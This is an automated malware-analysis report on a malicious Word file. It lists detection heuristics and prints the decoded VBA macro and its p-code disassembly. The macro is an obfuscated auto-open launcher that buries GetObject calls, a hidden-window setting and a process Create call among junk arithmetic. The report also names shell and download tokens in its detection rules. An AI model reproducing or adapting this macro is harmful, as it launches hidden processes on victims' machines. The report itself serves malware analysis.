MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Drsm-6900249-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Drsm-6900249-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set PADBxAU = GetObject(w_UDQ1.cZUA_c) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12874 bytes |
SHA-256: 897502dbcea3b43cb341f9f7b48c8b252dc19865dcfbb87a7ac83480719fcf9b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "BBABBX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "w_UDQ1"
Attribute VB_Base = "0{B6818453-DAAC-4BBC-BDA5-49D98F13EA16}{D1EC85BF-9CF2-45B6-A965-150BBC52AF46}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "ACAcDxA"
Sub autoopen()
On Error Resume Next
If qcQ1AAAA = rCwxAA Then
Kco_AwAA = 799178422 - fGUAZw
cxQAAAA = KBo_cZ_o + Oct(MBBDBDQ) / 919487372 * 412496744
Set mQZBAAA = KxD4_CAA
vQBoQA = (696895835 + 918586421 * bDAGA_D + CInt(383683400) + iBBDAw / joAQ1A)
IAcGkxCQ = 295588792
End If
If iACUUZU_ = KUUQU_ Then
rBwDUDAC = 706068284 - tQQwZBQ
QAwDAAQA = swAAXGQ1 + Oct(CQQAkDA) / 442888845 * 485499528
Set fUU_UAo4 = lAADDAA
wQw_oQA = (458232951 + 252499879 * RAocAAAB + CInt(772428375) + jkcA4cGx / sCAUUCBC)
jc4AAA = 830226674
End If
If E11DAA_A = wGUCDA Then
FBZDCxAx = 549335766 - dBxAZoA
bwAAQoc = iAA4_x + Oct(kAAAAD) / 489975870 * 137383594
Set uAwD_1D = CA4AAAAo
zDx11A1Z = (525704382 + 192121145 * wQQAAc + CInt(586070133) + aXkxQk1 / b__wAc)
wAAQBD = 43805403
End If
Set PADBxAU = GetObject(w_UDQ1.cZUA_c)
If RkUcZokA = WxA4AA4 Then
cDAAXAA = 241479733 - BXo4QwAA
lQUxAU1A = zUAoUAA + Oct(wAAwDU1) / 534468489 * 397176251
Set WBAZCxG = pAcxDC
AXAcBQA = (903973013 + 76979736 * PABAUo + CInt(60958860) + HCUAw1 / DAoAUA)
AU4AB4 = 859776799
End If
If iAAwA4QZ = wZBAUDA Then
WwAo_GA = 732012163 - BAoAAA
WDUGADA_ = RUGcXA + Oct(mCXQDBBw) / 588725801 * 580093628
Set oGA1AG = ZBwcAcUQ
l_AAx1 = (601520708 + 888222086 * sQQAUG1G + CInt(219551468) + aBAAXA / F_1AQB4B)
tGxUxoc = 765088581
End If
If r44AXA = kBxkBw Then
bDCoGU = 79480808 - TAAkAA
RGAAXAB = ZZA1A_AX + Oct(XUUkQUB) / 830935869 * 841049694
Set uxAUAQ = RDkXCw4_
SGCAAwxC = (549902528 + 93617319 * Xc1G4_k + CInt(602200872) + EAAADwAA / sA_AkA)
j1cBZx = 655545730
End If
PADBxAU.ShowWindow = 798855 - 798855
If iDDACCA = z_1AoU Then
PcAAC_ = 778506356 - UUwo_AA
IkAkAxA = OAkoU1x + Oct(oAAoBA) / 553425857 * 580232699
Set RQACk_Ao = J4x4oZ
axCBAQ = (555012393 + 957415488 * cwBwQo + CInt(14371698) + KxAkUAC / qAxDB1)
p_wkUA = 669722717
End If
If d1AAxAAD = QA_AcAA Then
F111kA = 835318987 - qQAAAwAD
kADBAB = p1o_c4G + Oct(NxGxXCk) / 536002814 * 162103150
Set QwBAACA = WAUAUx
SAXAAA = (50970156 + 64269164 * b_cAcC + CInt(212893555) + XCQxoAA / OAAAAA)
WAQ4QBw = 879371395
End If
If T_AQAA = jZAAAAx Then
UAAAUAD = 561312835 - PZAcZAQ
TZDZ_oAD = EAZQDC + Oct(qAUUcc_) / 682582591 * 54076216
Set sAQAxCx = XBDGAZxU
cxCAUo4A = (512492541 + 116418414 * qAoAA1A_ + CInt(829278997) + roABUD_ / tDA_oZ)
W1ZXGGA_ = 822461061
End If
GetObject(w_UDQ1.ukUQAAQ).Create% GAQwA_ + w_UDQ1.m1AQBUA + qQAAXZ + w_UDQ1.cX4cAk + VQD1CAAZ + w_UDQ1.IAQUZDkZ + wGkAAGA4, ZxoGACD4, PADBxAU, SDBDBkBD
If AQcBcA1C = wAcwoAA Then
RDAoAAUX = 266925652 - wQoAXxA
HZAAAxAD = i1UoQBC + Oct(q4kAoc) / 571205524 * 207097382
Set BoAA4Q = uDAoA1A
aokAwD = (3423715 + 57346181 * XCAwAB + CInt(157771230) + iBAAAxD / wBBwDo)
YCAQAU = 556314720
End If
If DDAxAG = iAADBZ Then
qAxDZAA = 203887486 - sUAZA1ZX
TUADAUx = YABxAoBA + Oct(MACcAAAU) / 162394649 * 904007924
Set h1AAAAC = pADBCx
f4B4AA = (776999636 + 411187819 * OccBXx + CInt(903146513) + jD_CADG / fUAADA)
OCwDQB = 993012233
End If
If FXZAAA4 = ABABAAQD Then
aAxAAoB4 = 283731435 - BAUUAB
NAB1xB = ZAXDUQZ4 + Oct(OAx4AA) / 941355638 * 700314968
Set EBABBAAA = BDGwDo
cA1DADB = (504600521 + 248509088 * OD1B44 + CInt(627515352) + poD4G1A / qAowUAU_)
OcDBABG = 654975529
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/3879db94c05a4d59b8cbcce229036a45.bin
' ===============================================================================
' Module streams:
' Macros/VBA/BBABBX - 1104 bytes
' Macros/VBA/w_UDQ1 - 1156 bytes
' Macros/VBA/ACAcDxA - 6496 bytes
' Line #0:
' FuncDefn (Sub ACAcDxA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld qcQ1AAAA
' Eq
' IfBlock
' Line #3:
' LitDI4 0x7EB6 0x2FA2
' Ld Kco_AwAA
' Sub
' St rCwxAA
' Line #4:
' Ld cxQAAAA
' Ld KBo_cZ_o
' ArgsLd Oct 0x0001
' LitDI4 0x438C 0x36CE
' Div
' LitDI4 0x3368 0x1896
' Mul
' Add
' St fGUAZw
' Line #5:
' SetStmt
' Ld mQZBAAA
' Set MBBDBDQ
' Line #6:
' LitDI4 0xC95B 0x2989
' LitDI4 0x8435 0x36C0
' Ld vQBoQA
' Mul
' Add
' LitDI4 0x8B48 0x16DE
' Coerce (Int)
' Add
' Ld bDAGA_D
' Ld iBBDAw
' Div
' Add
' Paren
' St KxD4_CAA
' Line #7:
' LitDI4 0x53B8 0x119E
' St joAQ1A
' Line #8:
' EndIfBlock
' Line #9:
' Ld IAcGkxCQ
' Ld iACUUZU_
' Eq
' IfBlock
' Line #10:
' LitDI4 0xBF3C 0x2A15
' Ld rBwDUDAC
' Sub
' St KUUQU_
' Line #11:
' Ld QAwDAAQA
' Ld swAAXGQ1
' ArgsLd Oct 0x0001
' LitDI4 0xF28D 0x1A65
' Div
' LitDI4 0x2288 0x1CF0
' Mul
' Add
' St tQQwZBQ
' Line #12:
' SetStmt
' Ld fUU_UAo4
' Set CQQAkDA
' Line #13:
' LitDI4 0x1477 0x1B50
' LitDI4 0xD7A7 0x0F0C
' Ld wQw_oQA
' Mul
' Add
' LitDI4 0x5257 0x2E0A
' Coerce (Int)
' Add
' Ld RAocAAAB
' Ld jkcA4cGx
' Div
' Add
' Paren
' St lAADDAA
' Line #14:
' LitDI4 0x40F2 0x317C
' St sCAUUCBC
' Line #15:
' EndIfBlock
' Line #16:
' Ld jc4AAA
' Ld E11DAA_A
' Eq
' IfBlock
' Line #17:
' LitDI4 0x32D6 0x20BE
' Ld FBZDCxAx
' Sub
' St wGUCDA
' Line #18:
' Ld bwAAQoc
' Ld iAA4_x
' ArgsLd Oct 0x0001
' LitDI4 0x703E 0x1D34
' Div
' LitDI4 0x4EAA 0x0830
' Mul
' Add
' St dBxAZoA
' Line #19:
' SetStmt
' Ld uAwD_1D
' Set kAAAAD
' Line #20:
' LitDI4 0x9CBE 0x1F55
' LitDI4 0x8939 0x0B73
' Ld zDx11A1Z
' Mul
' Add
' LitDI4 0xB875 0x22EE
' Coerce (Int)
' Add
' Ld wQQAAc
' Ld aXkxQk1
' Div
' Add
' Paren
' St CA4AAAAo
' Line #21:
' LitDI4 0x6ADB 0x029C
' St b__wAc
' Line #22:
' EndIfBlock
' Line #23:
' SetStmt
' Ld MSForms
' MemLd GetObject
' ArgsLd PADBxAU 0x0001
' Set wAAQBD
' Line #24:
' Ld cZUA_c
' Ld RkUcZokA
' Eq
' IfBlock
' Line #25:
' LitDI4 0xB035 0x0E64
' Ld cDAAXAA
' Sub
' St WxA4AA4
' Line #26:
' Ld lQUxAU1A
' Ld zUAoUAA
' ArgsLd Oct 0x0001
' LitDI4 0x5789 0x1FDB
' Div
' LitDI4 0x6DBB 0x17AC
' Mul
' Add
' St BXo4QwAA
' Line #27:
' SetStmt
' Ld WBAZCxG
' Set wAAwDU1
' Line #28:
' LitDI4 0x8895 0x35E1
' LitDI4 0x9E18 0x0496
' Ld AXAcBQA
' Mul
' Add
' LitDI4 0x288C 0x03A2
' Coerce (Int)
' Add
' Ld PABAUo
' Ld HCUAw1
' Div
' Add
' Paren
' St pAcxDC
' Line #29:
' LitDI4 0x271F 0x333F
' St DAoAUA
' Line #30:
' EndIfBlock
' Line #31:
' Ld AU4AB4
' Ld iAAwA4QZ
' Eq
' IfBlock
' Line #32:
' LitDI4 0x9E83 0x2BA1
' Ld WwAo_GA
' Sub
' St wZBAUDA
' Line #33:
' Ld WDUGADA_
' Ld RUGcXA
' ArgsLd Oct 0x0001
' LitDI4 0x3E29 0x2317
' Div
' LitDI4 0x86BC 0x2293
' Mul
' Add
' St BAoAAA
' Line #34:
' SetStmt
' Ld oGA1AG
' Set mCXQDBBw
' Line #35:
' LitDI4 0x7A44 0x23DA
' LitDI4 0x3186 0x34F1
' Ld l_AAx1
' Mul
' Add
' LitDI4 0x16EC 0x0D16
' Coerce (Int)
' Add
' Ld sQQAUG1G
' Ld aBAAXA
' Div
' Add
' Paren
' St ZBwcAcUQ
' Line #36:
' LitDI4 0x5345 0x2D9A
' St F_1AQB4B
' Line #37:
' EndIfBlock
' Line #38:
' Ld tGxUxoc
' Ld r44AXA
' Eq
' IfBlock
' Line #39:
' LitDI4 0xC7E8 0x04BC
' Ld bDCoGU
' Sub
' St kBxkBw
' Line #40:
' Ld RGAAXAB
' Ld ZZA1A_AX
' ArgsLd Oct 0x0001
' LitDI4 0x133D 0x3187
' Div
' LitDI4 0x665E 0x3221
' Mul
' Add
' St TAAkAA
' Line #41:
' SetStmt
' Ld uxAUAQ
' Set XUUkQUB
' Line #42:
' LitDI4 0xD8C0 0x20C6
' LitDI4 0x7CA7 0x0594
' Ld SGCAAwxC
' Mul
' Add
' LitDI4 0xDB28 0x23E4
' Coerce (Int)
' Add
' Ld Xc1G4_k
' Ld EAAADwAA
' Div
' Add
' Paren
' St RDkXCw4_
' Line #43:
' LitDI4 0xD582 0x2712
' St sA_AkA
' Line #44:
' EndIfBlock
' Line #45:
' LitDI4 0x3087 0x000C
' LitDI4 0x3087 0x000C
' Sub
' Ld wAAQBD
' MemSt j1cBZx
' Line #46:
' Ld ShowWindow
' Ld iDDACCA
' Eq
' IfBlock
' Line #47:
' LitDI4 0x1074 0x2E67
' Ld PcAAC_
' Sub
' St z_1AoU
' Line #48:
' Ld IkAkAxA
' Ld OAkoU1x
' ArgsLd Oct 0x0001
' LitDI4 0x9BC1 0x20FC
' Div
' LitDI4 0xA5FB 0x2295
' Mul
' Add
' St UUwo_AA
' Line #49:
' SetStmt
' Ld RQACk_Ao
' Set oAAoBA
' Line #50:
' LitDI4 0xD129 0x2114
' LitDI4 0x0040 0x3911
' Ld axCBAQ
' Mul
' Add
' LitDI4 0x4B72 0x00DB
' Coerce (Int)
' Add
' Ld cwBwQo
' Ld KxAkUAC
' Div
' Add
' Paren
' St J4x4oZ
' Line #51:
' LitDI4 0x285D 0x27EB
' St qAxDB1
' Line #52:
' EndIfBlock
' Line #53:
' Ld p_wkUA
' Ld d1AAxAAD
' Eq
' IfBlock
' Line #54:
' LitDI4 0xF4CB 0x31C9
' Ld F111kA
' Sub
' St QA_AcAA
' Line #55:
' Ld kADBAB
' Ld p1o_c4G
' ArgsLd Oct 0x0001
' LitDI4 0xC0FE 0x1FF2
' Div
' LitDI4 0x7F6E 0x09A9
' Mul
' Add
' St qQAAAwAD
' Line #56:
' SetStmt
' Ld QwBAACA
' Set NxGxXCk
' Line #57:
' LitDI4 0xBE2C 0x0309
' LitDI4 0xAB6C 0x03D4
' Ld SAXAAA
' Mul
' Add
' LitDI4 0x7F73 0x0CB0
' Coerce (Int)
' Add
' Ld b_cAcC
' Ld XCQxoAA
' Div
' Add
' Paren
' St WAUAUx
' Line #58:
' LitDI4 0x2483 0x346A
' St OAAAAA
' Line #59:
' EndIfBlock
' Line #60:
' Ld WAQ4QBw
' Ld T_AQAA
' Eq
' IfBlock
' Line #61:
' LitDI4 0xF443 0x2174
' Ld UAAAUAD
' Sub
' St jZAAAAx
' Line #62:
' Ld TZDZ_oAD
' Ld EAZQDC
' ArgsLd Oct 0x0001
' LitDI4 0x623F 0x28AF
' Div
' LitDI4 0x2338 0x0339
' Mul
' Add
' St PZAcZAQ
' Line #63:
' SetStmt
' Ld sAQAxCx
' Set qAUUcc_
' Line #64:
' LitDI4 0x03FD 0x1E8C
' LitDI4 0x676E 0x06F0
' Ld cxCAUo4A
' Mul
' Add
' LitDI4 0xCB15 0x316D
' Coerce (Int)
' Add
' Ld qAoAA1A_
' Ld roABUD_
' Div
' Add
' Paren
' St XBDGAZxU
' Line #65:
' LitDI4 0xC285 0x3105
' St tDA_oZ
' Line #66:
' EndIfBlock
' Line #67:
' Ld Create
' Ld MSForms
' MemLd GAQwA_
' Add
' Ld m1AQBUA
' Add
' Ld MSForms
' MemLd qQAAXZ
' Add
' Ld cX4cAk
' Add
' Ld MSForms
' MemLd VQD1CAAZ
' Add
' Ld IAQUZDkZ
' Add
' Ld wGkAAGA4
' Ld wAAQBD
' Ld ZxoGACD4
' Ld MSForms
' MemLd W1ZXGGA_
' ArgsLd PADBxAU 0x0001
' ArgsMemCall ukUQAAQ% 0x0004
' Line #68:
' Ld SDBDBkBD
' Ld AQcBcA1C
' Eq
' IfBlock
' Line #69:
' LitDI4 0xF654 0x0FE8
' Ld RDAoAAUX
' Sub
' St wAcwoAA
' Line #70:
' Ld HZAAAxAD
' Ld i1UoQBC
' ArgsLd Oct 0x0001
' LitDI4 0xE794 0x220B
' Div
' LitDI4 0x0E26 0x0C58
' Mul
' Add
' St wQoAXxA
' Line #71:
' SetStmt
' Ld BoAA4Q
' Set q4kAoc
' Line #72:
' LitDI4 0x3DE3 0x0034
' LitDI4 0x0885 0x036B
' Ld aokAwD
' Mul
' Add
' LitDI4 0x65DE 0x0967
' Coerce (Int)
' Add
' Ld XCAwAB
' Ld iBAAAxD
' Div
' Add
' Paren
' St uDAoA1A
' Line #73:
' LitDI4 0xB060 0x2128
' St wBBwDo
' Line #74:
' EndIfBlock
' Line #75:
' Ld YCAQAU
' Ld DDAxAG
' Eq
' IfBlock
' Line #76:
' LitDI4 0x137E 0x0C27
' Ld qAxDZAA
' Sub
' St iAADBZ
' Line #77:
' Ld TUADAUx
' Ld YABxAoBA
' ArgsLd Oct 0x0001
' LitDI4 0xF219 0x09AD
' Div
' LitDI4 0x10F4 0x35E2
' Mul
' Add
' St sUAZA1ZX
' Line #78:
' SetStmt
' Ld h1AAAAC
' Set MACcAAAU
' Line #79:
' LitDI4 0x12D4 0x2E50
' LitDI4 0x3A6B 0x1882
' Ld f4B4AA
' Mul
' Add
' LitDI4 0xEC11 0x35D4
' Coerce (Int)
' Add
' Ld OccBXx
' Ld jD_CADG
' Div
' Add
' Paren
' St pADBCx
' Line #80:
' LitDI4 0x2A09 0x3B30
' St fUAADA
' Line #81:
' EndIfBlock
' Line #82:
' Ld OCwDQB
' Ld FXZAAA4
' Eq
' IfBlock
' Line #83:
' LitDI4 0x65EB 0x10E9
' Ld aAxAAoB4
' Sub
' St ABABAAQD
' Line #84:
' Ld NAB1xB
' Ld ZAXDUQZ4
' ArgsLd Oct 0x0001
' LitDI4 0xF276 0x381B
' Div
' LitDI4 0xF558 0x29BD
' Mul
' Add
' St BAUUAB
' Line #85:
' SetStmt
' Ld EBABBAAA
' Set OAx4AA
' Line #86:
' LitDI4 0x97C9 0x1E13
' LitDI4 0xF2A0 0x0ECF
' Ld cA1DADB
' Mul
' Add
' LitDI4 0x1FD8 0x2567
' Coerce (Int)
' Add
' Ld OD1B44
' Ld poD4G1A
' Div
' Add
' Paren
' St BDGwDo
' Line #87:
' LitDI4 0x2229 0x270A
' St qAowUAU_
' Line #88:
' EndIfBlock
' Line #89:
' EndSub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.